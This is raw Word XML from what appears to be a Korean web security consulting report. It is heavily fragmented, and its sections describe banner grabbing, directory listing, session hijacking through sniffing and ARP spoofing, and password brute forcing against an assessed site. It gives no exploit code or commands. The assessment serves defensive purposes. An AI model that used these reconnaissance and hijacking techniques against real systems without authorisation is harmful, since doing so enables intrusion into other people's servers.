            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>14605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2423160" cy="218426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18892"/>
                <wp:lineTo x="21396" y="18892"/>
                <wp:lineTo x="21396" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="134" name="그림 134" descr="https://lh6.googleusercontent.com/KE8HfPOCUoDJ74MVobKJp5AN_RHBRbTOfA1PtZqJ6AQLekh2b2D3dMKTlCbjQBaI9aNijEgXgm-4BrUEsVrmIWl2ex2dR8nVfygCensh1UVwSwFPGiIq3_VWQA984XwDIXIVYK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6.googleusercontent.com/KE8HfPOCUoDJ74MVobKJp5AN_RHBRbTOfA1PtZqJ6AQLekh2b2D3dMKTlCbjQBaI9aNijEgXgm-4BrUEsVrmIWl2ex2dR8nVfygCensh1UVwSwFPGiIq3_VWQA984XwDIXIVYKT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EE7A5DA" wp14:editId="37D266AD">
            <wp:extent cx="1996440" cy="296768"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="135" name="그림 135" descr="https://lh3.googleusercontent.com/P2Mu6efB5jpKDUhRCUK_W4Q5xOGXuDpEiYPuTZ9H27ziXoRt3oBw3f9RZw6LkAfPtJNcWG82RuRmMGAJe5hUxsdwjzroBqaAr88v0i_IQvgiVs5iDfjGAuEWi49UVUP1mpOL4X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P2Mu6efB5jpKDUhRCUK_W4Q5xOGXuDpEiYPuTZ9H27ziXoRt3oBw3f9RZw6LkAfPtJNcWG82RuRmMGAJe5hUxsdwjzroBqaAr88v0i_IQvgiVs5iDfjGAuEWi49UVUP1mpOL4Xl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0" cy="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34182E" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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P</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UT, Delete Method</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 허용 안 됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034182E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30"/>
          <w:szCs w:val="3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B</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:t>anner Grabb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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이나 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와 같이 서비스에 연결하여 로그온을 수행할 때 나타나는 안내문을 통해 정보를 수집하는</w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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anner Grabbing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용하면 공격자는 공격대상의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">정보 및 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>정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 페이지의 종류 및 버전을 알아낼 수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30"/>
          <w:szCs w:val="3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F5A1F56" wp14:editId="4F7117A5">
            <wp:extent cx="3467100" cy="967740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="22" name="그림 22" descr="https://lh6.googleusercontent.com/wOqGca4bdJ-RdFEBE_WAB5p3PRze8Cgl-bWQoUoVD9uypifef9IXRee9Mb26rWo_NYT0WrLaMj5IROusvK0gedRo782IwUIQJbcNRYgQwSILqNH_yBn0sfqswZYdy2JoOxEGyx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wOqGca4bdJ-RdFEBE_WAB5p3PRze8Cgl-bWQoUoVD9uypifef9IXRee9Mb26rWo_NYT0WrLaMj5IROusvK0gedRo782IwUIQJbcNRYgQwSILqNH_yBn0sfqswZYdy2JoOxEGyxs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현재 컨설팅 대상의 웹 페이지에 접속 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/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 xml:space="preserve">을 확인하면 헤더를 통해 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>종류,</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전 정보를 확인 가능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6603B70" wp14:editId="54D4FB1F">
            <wp:extent cx="3497580" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="37" name="그림 37" descr="https://lh4.googleusercontent.com/kH4uSnSo00mqFJfpTn_IweA8fcE_1HxTg6dNV7D_qDYigsr8Ji_5RXqmvlBUJjoDo-niW7xkWzUKgQFlvRt3XL7e1Bxf2cJc6v8iv7fXk9LuWYu57v6RCfmqh7KCXBICd2U8_q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H4uSnSo00mqFJfpTn_IweA8fcE_1HxTg6dNV7D_qDYigsr8Ji_5RXqmvlBUJjoDo-niW7xkWzUKgQFlvRt3XL7e1Bxf2cJc6v8iv7fXk9LuWYu57v6RCfmqh7KCXBICd2U8_qL-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02B5E9C" wp14:editId="7AD96394">
            <wp:extent cx="3497580" cy="274320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="38" name="그림 38" descr="https://lh3.googleusercontent.com/SMrvEWqEBxNjyJjvz_4HfiOFwRN8Bi15NsvWssVkiEV4Gvr3RxV5VTEllkYlAAO1Nk_z65WO_U2Cd154tI6BNR-c2bvVGtoVsne4351AGleRjmyYj4CtiuhHr1zJrg9Rj84B22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SMrvEWqEBxNjyJjvz_4HfiOFwRN8Bi15NsvWssVkiEV4Gvr3RxV5VTEllkYlAAO1Nk_z65WO_U2Cd154tI6BNR-c2bvVGtoVsne4351AGleRjmyYj4CtiuhHr1zJrg9Rj84B22aX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1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H</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ttpint </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">툴을 이용하면 서버의 정보를 알아올 수 있는데 컨설팅 대상의 메인 페이지로 접속 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>되는 것과 서버,</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 정보가 노출되는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3">
      <w:pPr>
        <w:ind w:left="760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E56EE39" wp14:editId="17FDED81">
            <wp:extent cx="3505200" cy="853440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="25" name="그림 25" descr="https://lh6.googleusercontent.com/o1RB9CkgdVyMDFMaM--NFbmdlJaZ1Pfo91Yh3LAprRBY9zA8u4Up_xUrs46u_22nzuWgpo3fyPm4DavB6iysvQZTr0rlVwv2JDvmEtL_IkqBXkD7_pIwG_IL1g5fbOBD4W4RJO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o1RB9CkgdVyMDFMaM--NFbmdlJaZ1Pfo91Yh3LAprRBY9zA8u4Up_xUrs46u_22nzuWgpo3fyPm4DavB6iysvQZTr0rlVwv2JDvmEtL_IkqBXkD7_pIwG_IL1g5fbOBD4W4RJONH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컨설팅 대상의 웹 페이지 접속 후 기본 페이지에서 가지고 있지 않을 만한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파일을 불러오면 웹 페이지에 오류 메시지가 출력됨,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 xml:space="preserve">이 오류 메시지를 확인해보면 서버와 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 정보를 확인할 수 있음</w:t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sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Directory Listing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D</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB">
        <w:t>irectory Listing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B30CB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irectory Listing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Browsing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">하는 모든 파일을 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>보여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래의 목적은 문서의 공유로 파일 탐색기처럼 원하는 문서로 바로 찾아갈 수 있게 하는 용도였지만 최근에는 악의적인 목적을 갖고 있는 사람들에 의해 탈취 및 웹 서버 공격이 이루어지고 있음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피해 범위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서버내의 모든 D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">irectory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">혹은 중요한 정보가 포함된 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 대해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Indexing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이 가능하게 설정되어 중요파일 정보가 노출될 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B30CB" w:rsidRPr="001B30CB" w:rsidRDefault="001B30CB" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001B30CB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1F03E8B" wp14:editId="689C220D">
            <wp:extent cx="4876800" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="그림 39" descr="https://lh4.googleusercontent.com/OX4q1fdYc_-ZjaXzQv9kSKGe_SKn12JgWxx_NM0hiEPUFsq8m9Q5bJAcnHklUYLRafMsCZiUofRfw2EG_5kx1S-wo3kTsBqIjHkEyyJYVnGqS99WCsFRe8y8du0WqhJYOfHltE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OX4q1fdYc_-ZjaXzQv9kSKGe_SKn12JgWxx_NM0hiEPUFsq8m9Q5bJAcnHklUYLRafMsCZiUofRfw2EG_5kx1S-wo3kTsBqIjHkEyyJYVnGqS99WCsFRe8y8du0WqhJYOfHltET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현재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메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페이지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치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ain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상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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory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ome</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접속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해보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Directory Listing </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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행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통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기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다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Directory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구조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파악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1B30CB" w:rsidRDefault="001B30C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4B76C3" w:rsidRPr="001B30CB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4A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sniffing </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>통한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Hijacking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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:t>ession Hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B30CB" w:rsidRDefault="001B30CB" w:rsidP="001B30CB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가 가지는 고유한 취약점을 이용해 세션을 가로채는 공격을 뜻함</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>는 S</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">equence </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">번호가 잘못되면 이를 바로잡기 위한 작업을 하는데 서버와 클라이언트가 통신을 할 때 각각 잘못된 </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sequence </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번호를 위조,</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>위조된 번호로 연결된 S</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ession</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 혼란을 준 뒤 자신이 끼어들어가는 방식을 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B30CB" w:rsidRPr="00A24DB6" w:rsidRDefault="001B30CB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1B30CB" w:rsidRDefault="001B30CB" w:rsidP="001B30CB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A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와 C</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lient</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">간의 통신을 관찰할 수 있고 </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trust</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용한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 xml:space="preserve">은 물론 </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Telnet, FTP</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">등 </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용한 거의 모든 </w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 갈취가 가능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9EA9FB3" wp14:editId="68FD8080">
            <wp:extent cx="3893820" cy="1516380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="27" name="그림 27" descr="https://lh3.googleusercontent.com/8bMeRgwTpA0zvSOhQa1zAoCpLgCHSjUwKWbn4GKZWcIyY84g4aqghdgd-TEUiYSRjd0W9hFkD6F9KZCLQd5sBKn3YUihNLvN5NbPsBKpsLtafvsOERA6sRZhDlCcYfbSQee9T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8bMeRgwTpA0zvSOhQa1zAoCpLgCHSjUwKWbn4GKZWcIyY84g4aqghdgd-TEUiYSRjd0W9hFkD6F9KZCLQd5sBKn3YUihNLvN5NbPsBKpsLtafvsOERA6sRZhDlCcYfbSQee9T9E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ARP Spoofing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B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격으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Sniffing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성공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지만</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용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암호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통신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하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었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때문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4B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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내용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있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알아내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못함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24DB6" w:rsidRDefault="00A24DB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="00A24DB6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C73585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A24DB6">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Password Brute Forcing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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:t>D / Password Brute Forcing[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>무차별 대입 공격</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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무차별 대입 공격은 가능한 모든 암호 조합을 무차별로 시도하는 다소 기초적인 방식의 해킹 공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반적인 암호는 충분한 시간만 주어진다면 모두 대입이 가능하고 특정 단어나 패턴이 유추 가능할 경우엔 더욱 취약할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24DB6" w:rsidRDefault="00A24DB6" w:rsidP="00A24DB6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들은 대입에 소요되는 시간을 줄이기 위해 사전에 있는 단어를 우선 시도하는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dictionary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 수행하기도 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24DB6" w:rsidRPr="00A24DB6" w:rsidRDefault="00A24DB6" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24DB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24DB6" w:rsidRPr="00A15254" w:rsidRDefault="00A24DB6" w:rsidP="00A24DB6">
      <w:pPr>
        <w:ind w:left="1120"/>
